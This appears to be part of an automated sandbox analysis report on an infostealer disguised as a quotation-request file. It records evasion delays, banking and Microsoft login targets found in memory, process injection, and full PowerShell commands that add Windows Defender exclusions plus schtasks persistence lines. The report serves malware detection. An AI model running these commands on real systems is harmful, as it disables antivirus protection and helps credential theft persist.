Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 597469	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 597139	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 596922	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 595719	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 595500	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 595390	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 595172	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 595062	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 594843	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 594720	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 594594	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 599891
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 599672
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 599541
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 599218
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 599109
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 599000
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 598890
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 598781
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 598672
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 598560
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 598453
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 598344
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 598219
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 598109
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 598000
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 597885
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 597781
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 597672
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 597562
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 597453
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 597344
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 597232
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 597125
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 597016
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 596891
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 596766
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 596656
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 596546
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 596437
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 596328
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 596219
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 596109
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 596000
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 595891
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 595766
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 595641
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 595531
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 595422
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 595312
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 595203
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 595094
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 594984
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 594875
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 594765
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 594656
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 594547

Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696497155\|UE
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696497155s
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696497155f
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3826307981.0000000001348000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllfoX
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696497155f
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696497155s
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696497155j
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696497155j
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696497155o
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696497155\|UE
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696497155o
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3826220785.0000000000C99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllok
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: NuDUTBObHpKADz.exe, 0000000A.00000002.1468102089.0000000001162000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

Code function: 9_2_06DE9548 LdrInitializeThunk,

9_2_06DE9548

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe"
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe"
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

Memory written: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmp8B51.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process created: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmpA2A1.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process created: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe "C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Queries volume information: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
